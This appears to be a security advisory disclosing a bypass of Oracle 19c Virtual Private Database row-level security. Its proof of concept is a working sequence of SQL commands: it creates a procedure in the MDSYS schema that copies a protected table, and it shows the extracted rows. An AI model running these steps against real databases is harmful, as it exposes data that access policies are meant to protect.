Breaking Oracle Database VPD Through DDL Permissions In 19c

`Title: Breaking Oracle Database VPD (Virtual Private Database) Through DDL Permissions in 19c  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 19c  
Tested Version(s): 19c  
Risk Level: Low  
Author of Advisory: Emad Al-Mousa  
  
  
*****************************************  
Vulnerability Details:  
  
By design VPD security feature protects against any database account that is not granted EXEMPT ACCESS POLICY from viewing the complete database rows within the table in addition of course to DBA role which I am going to tackle at the end.  
  
However, this security feature will not protect against accounts with DDL permissions especially an account granted the following permissions: create any procedure, execute any procedure, select any table  
  
For VPD simulation you can follow steps in this link: https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/  
  
  
*****************************************  
Proof of Concept (PoC):  
  
sqlplus / as sysdba  
  
SQL> alter session set container=PDB1  
  
SQL> CREATE USER owoods IDENTIFIED BY owoods  
  
DEFAULT TABLESPACE users TEMPORARY TABLESPACE temp;  
  
SQL> GRANT connect, resource, create any procedure, execute any procedure, select any table  
  
to owoods;  
  
SQL> GRANT READ ON sh1.customers TO owoods;  
  
SQL> exit;  
  
sqlplus owoods/owoods@PDB1  
  
SQL> grant read on sh1.orders_tab to public;  
  
SQL>CREATE OR REPLACE PROCEDURE MDSYS.fetch_data AS  
  
vsql VARCHAR2(4000);  
  
BEGIN  
  
vsql := 'create table MDSYS.orders_tab_copy2 as select * from sh1.orders_tab ';  
  
EXECUTE IMMEDIATE vsql;  
  
END;  
  
/  
  
SQL> exec MDSYS.fetch_data;  
  
SQL> select * from MDSYS.orders_tab_copy2;  
  
CUST_NO ORDER_NO  
  
———- ———-  
  
1234 9876  
  
5678 5432  
  
  
  
  
All rows were successfully extracted from the table (the ones by default owoods account have no access to).  
  
Another important thing to consider is “DBA” role behaviour….EXEMPT ACCESS POLICY system privilege is not part of DBA role so be careful because DBA role implicitly has GRANT ANY PRIVILEGE system privilege which enables the DBA account to gran it any way.  
  
  
  
*****************************************  
References:  
https://docs.oracle.com/en/database/oracle/oracle-database/19/dbseg/using-oracle-vpd-to-control-data-access.html#GUID-7FFB40CB-E421-4FE4-8344-29D91360EFAD  
https://geodatamaster.com/2024/09/04/oracle-vpd-virtual-private-database-row-level-security-in-19c-and-23ai/  
https://databasesecurityninja.wordpress.com/2024/09/07/breaking-oracle-database-vpd-virtual-private-database-through-ddl-permissions-in-19c/  
https://databasesecurityninja.wordpress.com/2024/09/04/oracle-database-exempt-access-policy-not-logged-for-sys-account-in-unified-audit-log-ora_secureconfig/  
  
  
  
`